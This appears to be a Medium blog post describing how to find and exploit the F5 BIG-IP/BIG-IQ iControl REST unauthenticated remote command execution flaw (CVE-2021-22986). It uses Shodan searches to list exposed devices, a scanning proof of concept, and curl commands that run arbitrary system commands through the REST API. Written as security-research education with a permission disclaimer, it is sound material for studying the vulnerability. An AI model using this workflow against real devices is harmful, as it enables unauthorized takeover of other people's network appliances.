Finding and exploiting iControl REST unauthenticated RCE[ CVE-2021–22986 ]

In march 10 , F5 released and advisory about the Unauthenticated rce on icontrol . On their report they described that any unauthenticated users can execute arbitrary system commands, create or delete files, or disable services.

Vulnerable/affected versions are:

  • F5 BIG-IQ 6.0.0–6.1.0
  • F5 BIG-IQ 7.0.0–
  • F5 BIG-IQ 7.1.0–
  • F5 BIG-IP 12.1.0–
  • F5 BIG-IP 13.1.0–
  • F5 BIG-IP 14.1.0–
  • F5 BIG-IP 15.1.0–15.1.2
  • F5 BIG-IP 16.0.0–16.0.1

There are no specific way to directly found the vulnerable device or network, we are gonna use simple Big-Ip detection method to to find systems potentially impacted by CVE-2021–22986.

Or We can use the IOC [Indicators of Compromise ] to detect potentially vulnerable devices. F5 Described on their article affected device will contain this text on /var/log/restjavad*.log.

"X-F5-Auth-Token doesn’t have value"

We can use Shodan to find potentially vulnerable devices . We can use the same filter we use to detect big ip devices on shodan.


shodan shows 10,910 devices , not all of them are vulnerable we are gonna detect and exploit the vulnerability using a simple proof of concept written by Al1ex. The Poc contains chinese word here is the translated version. We can either download all the result or use shodan cli to scan for this cve. First lets start with the downloaded shodan result.

We can download the result by using download result button.after downloading the result and the poc. Lets start detecting the vulnerability using this poc. by typing python3 -h we can see the help menu.

We can see on the help menu their is option described as batch detection

python3  -s true -f filename

first lets filter ip from the result we have downloaded from shodan,we can do that by using grep and regex on our linux shell.

cat shodan_file | grep -Po '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'

so lets save the output to a file , now its time to start the scan.

after detecting you can use to execute command on the target system without writing the full exploit command again and again.

You can exploit this vulnerability manually using these steps.

Step-1: curl -ksu admin: https://[target-ip]/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”[command-to-execute]”}’

Step-2: curl -ksu admin: https://[target-ip]/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”[command-to-execute]”}’

Step-3: curl -su admin: -H “Content-Type: application/json” http://[target-ip]:8100/mgmt/tm/util/bash -d ‘{“command”:”run”,”utilCmdArgs”:”-c [command-to-execute]”}’

Using automated exploit is much fast for detection and exploiting , manual exploition is slow , it will take more time to test a list.

You can use this to find P1 on your bugbounty program if any of their big ip product is vulnerable with the same vulnerability.

Nuclei Detection Script: CVE-2021–22986.yaml

[ Declaimer: the ip i have tested and exploited was my own local docker ip , please do not exploit or test others ip without permission.This article is Educational purposes only. ]




Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Merkle Swap | Convert ESN to ETH ERC20 (Part-3 – Claim Your Tokens)

How To Find Out If Someone Hacked Your Computer Mac

How To Add Two Factor Authentication (2FA) To Kraken

Compliance on Blockchain и

MoonSwap: “FC donation proposal”has been approved by the Conflux committee to motivate users to…

{UPDATE} Jailbreak: Escape Plan Hack Free Resources Generator

{UPDATE} 大海賊クエスト島 Hack Free Resources Generator

{UPDATE} Arrow Fear Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joy Ghosh

Joy Ghosh

Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

More from Medium

Insecure Deserialization — FAQ

CVE-2021–3817: From SQLi to plaintext admin password recovery

Mutation XSS

Intigriti XSS Challenge 0222 — Write-Up